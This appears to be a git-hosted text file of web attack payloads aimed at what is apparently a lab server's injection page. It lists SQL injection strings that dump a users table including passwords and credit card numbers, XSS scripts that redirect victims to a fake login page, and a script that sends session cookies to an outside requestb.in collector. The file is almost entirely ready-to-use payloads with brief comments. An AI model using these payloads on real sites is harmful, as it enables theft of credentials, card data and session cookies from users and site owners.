mark.george / jetty
Transfer to URL with SHA Find file
Newer
Older
jetty / xss.txt
Mark George on 28 Sep 2017 910 bytes Initial commit.
Raw Blame History 
http://139.80.81.78:8080/injection/


// basic injection
' or 1=1;--


// get admin's credentials
'or 1=1 union select 'WOOHOO!' from users order by name desc; --

// get entire users table
'or 1=1 union select group_concat(username||':'||password||':'||name||':'||credit_card) from users as name order by name desc; --

// change color
food<script>document.body.style.backgroundColor='#FF0000'</script>

// change back button
food<br/><a href="https://i.chzbgr.com/maxW500/4554986496/hF3327748/">Back</a><!--

// fake login
<script>alert('Session timed out.  Please log in to continue.');window.location='http://139.80.81.78:8080/injection/herephishyphishy.jsp'</script>

// display cookies
<script>alert(document.cookie)</script>

// send cookies to request.bin
<script>window.location='https://requestb.in/1jledlk1?'+document.cookie</script>

// setting cookie via console
document.cookie = "JSESSIONID=?"